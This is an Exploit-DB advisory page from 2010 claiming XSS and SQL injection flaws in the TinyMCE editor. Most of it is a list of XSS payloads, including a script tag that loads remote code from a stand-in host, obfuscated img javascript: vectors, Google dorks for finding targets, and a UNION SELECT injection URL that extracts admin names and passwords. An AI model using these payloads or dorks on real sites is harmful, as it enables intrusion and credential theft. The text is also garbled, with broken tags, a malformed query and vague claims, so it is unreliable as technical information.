TinyMCE WYSIWYG Editor - Multiple Vulnerabilities

EDB-ID:

11358

CVE:

N/A




Platform:

PHP

Date:

2010-02-07


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

[+] Vurnerebility:	*Js tiny_mce/tiny_mce WYSIWYG{java script} vurnerebility xss-->popup 
			*& SQl implemented
[+] Language	 :	Java--,Xml
[+] lisences	 :	LGPL
[+] Vendor	 : 	Moxiecode Systems AB
[+] support	 :      IE7J0/IE6.0/NS8.1-IE/NS8.1-G/FF2.0/O9.02;
[+] Category	 :	bug report
[+] vendor	 :	http://tinymce.moxiecode.com/
[+] implemented  :	joomla componen,drupal..
[+] Author 	 :	mc2_s3lector //yogyacarderlink.web.id
[+] dork   	 :	powered:powered by CMS
	   	 :	inurl"file_manager.php?type=img"
[+] Contact	 : 	(00x0---www.yogyacarderlink.web.id
[+]date		 :	4-2-10
[+] biGthank to	 :	Allah,jasakom,KeDai Computerworks,all indonesian like a coding,
------------------------------------------------------------------------------------
--[Vulnerability sampling]--
-------------------------------------------------------------------------------------------------------------------------

-------------------------------------------------------------------------------------------------------------------------
#	alert(String.fromCharCode(X1,X2,X3,X4))//";alert(String.fromCharCode(X1,X2,X3,x4))//\";
	alert(String.fromCharCode(X1,X2,X3,x4))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(X1,X2,X3,x4))</SCRIPT>
#	
-------------------------------------------------------------------------------------------------------------------------
#	'';!--"<XSS>=&{()}'
------------------------------------------------------------------------------------
	<script SRC=http//:server.com/xss.js></put_SCRIPT>
	<a hreef="http://www.server://www.server.com/server.com/">put_code</a>
	<a href="http://www.server.com./">put_code</a>
	<marquee>http://server.net">put_code</marquee>
	<a href="//srver.net">put_code</A>
	<a href="http://0x1x.01x0061.0x6/">put_code</a>
------------------------------------------------------------------------------------
	[Thread img src]

	"<img src=javascript:alert(&quot;XSS&quot;)>"
	"<img src="javascript:alert('Put_script');"> [or] <IMG SRC=javascript:alert('put_Script')>"
	"<IMG SRC=javascript:alert(String.fromCharCode(X1,X2,X3,X4))>"
	"<img src=`javascript:alert("put_xss")`>"
	"<IMG SRC="jav	ascript:alert('XSS');">"

	<IMG
	SRC
	=
	"
	write javascript vertikal position exmpl:	
	j
	s
	:
	a
	l
	e
	r
	t
	(
	'
	put code vertical position
	'
	)
	)
	;
	>

	"<IMG SRC=&#1;&#2;&#3;&#4;&#5;&#6;&#7;>"

try conversion---->use RainbowText from <IMG SRC=&#1;&#2;&#3;&#3>
make compilign:
<font color="#ff0000">&lt;</font><font color="#ff4200">I</font><font color="#ff8500">M</font><font color="#ffc700">G</font> <font color="#f3ff00">S</font><font color="#b1ff00">R</font><font color="#6eff00">C</font><font color="#2cff00">=</font><font color="#00ff16">&amp;</font><font color="#00ff58">#</font><font color="#00ff9b">1</font><font color="#00ffdd">;</font><font color="#00ddff">&amp;</font><font color="#009bff">#</font><font color="#0058ff">2</font><font color="#0016ff">;</font><font color="#2c00ff">&amp;</font><font color="#6e00ff">#</font><font color="#b100ff">3</font><font color="#f300ff">;</font><font color="#ff00c7">&amp;</font><font color="#ff0085">#</font><font color="#ff0042">3</font><font color="#ff0000">&gt;</font>
-------------------------------------------------------------------------------------------------------------------------------------------------------------

SQL implemented:Injection vulnerability---->installed on c-panel(joomla---sampling write tabel view/editor)

Exploit :server/patch/index.php?menuID=-value union select//**//users/2,3,4,5/password//**//from/2,3,4,5//,Group_CONCAT(name,CHAR(3,4,5),wachtwoord),2,3 from admin--




#########################################################################################################

# www.yogyacarderlink.web.id